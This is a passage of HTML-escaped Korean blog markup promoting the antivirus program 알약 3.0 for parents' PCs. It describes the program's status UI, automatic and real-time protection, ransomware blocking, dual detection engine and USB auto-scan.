&lt;p id=&quot;SE-3d23c5a8-6aca-4fec-987b-eaa949d75308&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;정기적인 검사&amp;middot;업데이트가 이루어지지 않는 경우가 많아 감염을 늦게 발견하고 피해가 커지기 쉬운 구조입니다.&lt;/p&gt;
&lt;p id=&quot;SE-ea70a49e-4329-474f-b52e-ec3a338ec7e3&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;p id=&quot;SE-f11379a3-1756-43ab-a9e0-aee3d7b15f35&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-4882ffdf-4527-48e7-9ce6-83c570ecb90f&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;알약 3.0, 부모님 PC를 위한 &amp;lsquo;쉽고 강력한 보안&amp;rsquo;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://bit.ly/49F25vb&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;알약 3.0&lt;/b&gt;&lt;/a&gt;은 복잡한 보안 기능을 최대한 쉽게 사용할 수 있도록 &lt;u&gt;&lt;span&gt;직관적인 UI, 자동화된 관리, 실시간 보호&lt;/span&gt;&lt;/u&gt;를 중심으로 설계된 PC 백신입니다.&lt;/p&gt;
&lt;p id=&quot;SE-afffaaac-fe80-4ee1-abf3-35c7dd870d3e&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-c510e49c-de8b-43b6-8a50-ad221b2961e5&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dwZcy9/dJMcacVSTg9/vwzcx9cTqQrgQ3wncZ6wTK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dwZcy9/dJMcacVSTg9/vwzcx9cTqQrgQ3wncZ6wTK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dwZcy9/dJMcacVSTg9/vwzcx9cTqQrgQ3wncZ6wTK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdwZcy9%2FdJMcacVSTg9%2Fvwzcx9cTqQrgQ3wncZ6wTK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;423&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-bd107bd7-bc5d-40e2-8931-392354f52ac7&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;
&lt;div&gt;
&lt;p id=&quot;SE-06a5fa67-b005-4fbc-8a5e-eb7b1575f328&quot; style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;더 쉬운 보안, 더 간편한 사용으로&lt;/b&gt;&lt;/p&gt;
&lt;p id=&quot;SE-d19fca37-905b-485a-b636-2f37bfe6b889&quot; style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;b&gt; 알약이 보안을 책임집니다&lt;/b&gt;&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-94cae394-0e77-4bb7-9151-4690a8e51318&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1) 한눈에 보이는 보안 상태 표시 UI&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;컬러와 아이콘, 알약 캐릭터의 표정 변화를 통해 현재 PC 상태를 직관적으로 확인할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;초록&amp;middot;노랑&amp;middot;빨강 컬러로 위험도를 즉시 파악하고, 필요한 조치를 한 문장으로 안내해 복잡한 판단 없이도 현재 상태를 이해할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;464&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cGvxLk/dJMcaihu5cq/5GWBpU8P8hKpIJnPKxHU6k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cGvxLk/dJMcaihu5cq/5GWBpU8P8hKpIJnPKxHU6k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cGvxLk/dJMcaihu5cq/5GWBpU8P8hKpIJnPKxHU6k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcGvxLk%2FdJMcaihu5cq%2F5GWBpU8P8hKpIJnPKxHU6k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;464&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;464&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;초록/노랑/빨강 컬러로 즉각적인 위험 판단&lt;/li&gt;
&lt;li&gt;캐릭터 표정 변화로 상태를 직관적으로 전달&lt;/li&gt;
&lt;li&gt;필요한 조치를 한 문장으로 안내&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자는 복잡한 지식 없이도 지금 PC가 안전한지 바로 파악할 수 있습니다.&lt;/p&gt;
&lt;p id=&quot;SE-e8e3db80-69dc-4ae3-b2dd-902c1dc9b8fa&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-dba206ff-c71b-4062-b3fb-728ea8329f03&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p id=&quot;SE-9c067b22-bca6-47df-876d-7d24ec0b4c3d&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-28b80fc8-a082-4022-8317-0b6d482a339c&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-6997d9cf-45da-43f0-b9c0-07b737c0a367&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2)&amp;nbsp;설치&amp;nbsp;즉시&amp;nbsp;시작되는&amp;nbsp;자동&amp;nbsp;보호&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 3.0은 설치만 하면 실시간 감시, 정기 검사, USB 자동 검사 등 기본 보호 기능이 자동으로 작동합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[자동 실행 기능]&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;실시간 감시&lt;/li&gt;
&lt;li&gt;정기 검사&lt;/li&gt;
&lt;li&gt;USB 자동 검사&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;또한 최신 보안 위협에 대응하기 위해&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;엔진 및 패턴 업데이트가 자동으로 이루어져&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;, 별도로 업데이트를 신경 쓰지 않아도 항상 최신 보호 상태를 유지할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3)&amp;nbsp;PC&amp;nbsp;사용을&amp;nbsp;방해하지&amp;nbsp;않는&amp;nbsp;백그라운드&amp;nbsp;보호&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;보안 프로그램이 PC를 느리게 만든다는 인식을 줄이기 위해, 알약 3.0은 검사와 보호 과정을 백그라운드에서 효율적으로 수행합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;검사 중에도 PC 사용에 부담을 주지 않도록 최적화&lt;/li&gt;
&lt;li&gt;화면 멈춤, 과도한 알림 최소화&lt;/li&gt;
&lt;li&gt;필요한 순간에만 안내 제공&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;검사 중에도 일상적인 PC 사용에 부담을 주지 않으며, 꼭 필요한 순간에만 알림을 제공해 사용 흐름을 방해하지 않습니다.&lt;/span&gt;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4)&amp;nbsp;위협&amp;nbsp;발생&amp;nbsp;순간을&amp;nbsp;놓치지&amp;nbsp;않는&amp;nbsp;실시간&amp;nbsp;감시&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실시간 감시는 &lt;span style=&quot;background-color: #ffffff; color: #0e0e0e; text-align: left;&quot;&gt;PC 사용 중 발생하는 주요 위협 행위를 실시간으로 감시&lt;/span&gt;합니다. &lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;파일 다운로드, 프로그램 설치, 링크 클릭 등&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;PC 사용 중 발생하는 주요 위협 행위&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;를 실시간으로 감시하고, 악성 행위가 감지되면 즉시 차단합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;다운로드&amp;middot;설치&amp;middot;링크 클릭 순간에 위험 여부 판단&lt;/li&gt;
&lt;li&gt;악성 행위는 즉시 차단&lt;/li&gt;
&lt;li&gt;위험 상황에서는 사용자가 헷갈리지 않도록 권장되는 조치를 중심으로 안내&lt;/li&gt;
&lt;li&gt;판단 실수로 이어지는 클릭을 크게 감소&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위험 상황에서는 사용자가 헷갈리지 않도록 권장되는 조치를 중심으로 안내해, 판단 실수로 이어질 수 있는 클릭을 줄여줍니다. 이렇게 알약 3.0은 가장 취약한 &amp;lsquo;순간&amp;rsquo;을 정확히 잡아내어 부모님 PC를 안전하게 보호합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;5) 랜섬웨어&amp;nbsp;사전&amp;nbsp;차단으로&amp;nbsp;소중한&amp;nbsp;파일&amp;nbsp;보호&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 3.0은 랜섬웨어의 비정상적인 행위를 조기에 감지해 &lt;span&gt;파일 암호화가 진행되기 전에 공격을 차단&lt;/span&gt;합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;중요 문서와 파일을 노리는 랜섬웨어 위협으로부터 PC를 보호해, 갑작스러운 데이터 손실 위험을 최소화합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;6) 숨은 위협까지 잡아내는 듀얼 탐지 엔진&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 3.0은 &lt;span&gt;자체 탐지 엔진과 글로벌 보안 엔진을 함께 활용한 듀얼 엔진 구조&lt;/span&gt;로, 단일 엔진으로 놓치기 쉬운 위협까지 탐지합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;464&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ll6Hq/dJMcabvUrJ6/BJ3dQDJ1b0IIA95sDVdoL1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ll6Hq/dJMcabvUrJ6/BJ3dQDJ1b0IIA95sDVdoL1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ll6Hq/dJMcabvUrJ6/BJ3dQDJ1b0IIA95sDVdoL1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fll6Hq%2FdJMcabvUrJ6%2FBJ3dQDJ1b0IIA95sDVdoL1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;464&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;464&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[탐지 효과]&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;백그라운드에서 몰래 설치되는 광고 프로그램&amp;middot;스파이웨어 차단&lt;/li&gt;
&lt;li&gt;숨겨진 설치 프로세스 감시&lt;/li&gt;
&lt;li&gt;악성 행위 확인 시 즉시 중단&lt;/li&gt;
&lt;li&gt;PC 느려짐&amp;middot;원치 않는 광고창 발생 예방&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;겉으로는 정상처럼 보이지만 백그라운드에서 실행되는 광고 프로그램이나 스파이웨어도 탐지&amp;middot;차단해 PC 느려짐과 원치 않는 광고 발생을 예방합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;7) USB 연결 즉시 감염 차단 &amp;mdash; USB Auto Scan&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;부모님 세대에서 특히 많이 발생하는 USB 감염을 해결하기 위해 기본 기능으로 제공됩니다. USB&amp;middot;외장하드 연결 시 자동으로 검사를 실행해, 이동식 저장장치를 통한 악성코드 유입을 사전에 차단합니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[자동 검사 프로세스]&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;USB&amp;middot;외장하드 연결 즉시 검사 시작&lt;/li&gt;
&lt;li&gt;악성 파일은 자동 차단&amp;middot;자동 치료&lt;/li&gt;
&lt;li&gt;별도 조작 없이 사용 가능&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;별도의 조작 없이 자동으로 검사&amp;middot;치료가 이루어져 USB 사용 빈도가 높은 환경에서도 안심하고 사용할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-c245c88b-6b93-475f-b2aa-0c08877eed9d&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p id=&quot;SE-b0b6a8ec-81cf-4309-9ba9-d3f938c711da&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;b&gt;​&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-7aa54369-fb28-457b-8c85-e59f8f22d198&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p id=&quot;SE-e44ad4cc-1575-439f-b141-89a8da6fbde1&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-93dd69e7-5d3f-4524-9b19-ced4dca49387&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-badc8aba-b3af-4a55-a300-9725e4a15704&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-af76ad55-86a4-49d5-84d8-306f4e707ddf&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;부모님 PC 보안, 알약 3.0이면 충분합니다!&lt;/b&gt;&lt;/span&gt;&lt;b&gt;​&lt;/b&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-a69559c9-47f3-44ee-a31b-9632c7a5269d&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;복잡한 설정 없이 설치만 하면 자동으로 보호가 시작되고, 한눈에 보이는 UI와 실시간 감시, 랜섬웨어 사전 차단, 자동 업데이트까지.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;부모님이 불편함 없이 PC를 사용할 수 있도록 설계된 &amp;lsquo;국민 백신&amp;rsquo; 알약 3.0으로,&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;부모님 PC 보안을 지금 바로 점검해보세요!&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-c59338ef-a2ce-4200-aa72-300042ea0cd8&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;&gt;&lt;a href=&quot;https://bit.ly/49F25vb&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nSXId/dJMcabvUrJ7/2aLKEDWchMrT9wkZksXkO0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnSXId%2FdJMcabvUrJ7%2F2aLKEDWchMrT9wkZksXkO0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;423&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-fe4d88eb-fc09-41bf-9733-10ac4edc63c7&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p id=&quot;SE-136a7036-ce81-4543-ac6b-57ffd9a85d1e&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;b&gt;​&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
